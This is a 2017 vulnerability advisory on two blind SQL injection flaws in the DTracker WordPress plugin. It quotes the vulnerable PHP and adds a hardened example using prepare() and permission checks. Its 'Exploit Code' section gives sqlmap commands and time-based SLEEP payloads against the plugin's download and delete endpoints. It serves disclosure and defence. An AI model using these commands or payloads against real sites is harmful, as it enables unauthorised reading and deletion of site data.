Advisory #: 183
Title: Multiple Blind SQL injection vulnerabilities in WordPress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID: CVE-2017-1002004, CVE-2017-1002005
CWE: CWE-89 SQL Injection
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=183
Description: Tracks the details of users downloading PDF files from a WordPress site.
Vulnerability:
CVE-2017-1002004: In file ./dtracker/download.php user input from the id variable isn't sanitized before it is appended to the end of an SQL query:

  $doc_id = $_GET['id'];
  $file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );

The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.

CVE-2017-1002005: In file ./dtracker/delete.php user input from the contact_id variable isn't sanitized before it is appended to the end of an SQL query:

  $contact_id = $_POST['contact_id']; //Contact ID to be deleted
  $query = "DELETE FROM wp_contacts WHERE id = $contact_id";
  $wpdb->query($query); // Delete the contact

The user does not need to be authenticated to the WordPress installation to exploit this vulnerability.
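The two unsanitized interpolations above, next to a hardened form of each handler. This is an added example written for this advisory, not code from the DTracker plugin; it assumes it runs inside WordPress (so $wpdb, absint(), current_user_can(), check_admin_referer() and wp_die() are available), and the function names, the capability and the nonce action are assumptions.

```php
<?php
// Added example, not the plugin's code. Shows the advisory's vulnerable
// pattern (commented out) beside a version that binds the value with
// $wpdb->prepare() and, for the delete path, also requires authorisation.

// --- Vulnerable pattern from download.php (as described in the advisory) ---
// $doc_id = $_GET['id'];
// $file   = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " );
// The value is interpolated unquoted, so whatever arrives in ?id= becomes
// part of the WHERE clause instead of a bound integer.

function dtracker_safe_get_document( $raw_id ) {          // name is an assumption
    global $wpdb;
    // Coerce to a non-negative integer before the value goes anywhere near SQL.
    $doc_id = absint( $raw_id );
    if ( 0 === $doc_id ) {
        return null;
    }
    // %d is bound by prepare(); the query text never contains user input.
    // $wpdb->posts is the prefixed posts table (wp_posts with the default prefix).
    $sql = $wpdb->prepare( "SELECT * FROM {$wpdb->posts} WHERE ID = %d", $doc_id );
    return $wpdb->get_row( $sql );
}

// --- Vulnerable pattern from delete.php (as described in the advisory) ---
// $contact_id = $_POST['contact_id'];
// $wpdb->query( "DELETE FROM wp_contacts WHERE id = $contact_id" );

function dtracker_safe_delete_contact( $raw_contact_id ) { // name is an assumption
    global $wpdb;
    // The original endpoint needed no authentication. Require a capability and
    // a nonce so only an authorised, intentional request can delete a row.
    if ( ! current_user_can( 'manage_options' ) ) {         // capability is an assumption
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'dtracker_delete_contact' );        // nonce action is an assumption

    $contact_id = absint( $raw_contact_id );
    if ( 0 === $contact_id ) {
        return false;
    }
    // Same table as the advisory's wp_contacts, built from the configured prefix.
    $table = $wpdb->prefix . 'contacts';
    return $wpdb->query(
        $wpdb->prepare( "DELETE FROM {$table} WHERE id = %d", $contact_id )
    );
}
```

With the integer bound through prepare(), the time-based payloads shown in the sqlmap output below are sent as the literal value 0 and match nothing.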
Exploit Code:
$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*' --dbms mysql --level 3 --risk 3
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
---
[10:14:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[10:14:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 14 times
[10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

$ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*' --dbms mysql --risk 1 --level 3

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
---
[11:53:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
[11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
Screen Shots:
Notes: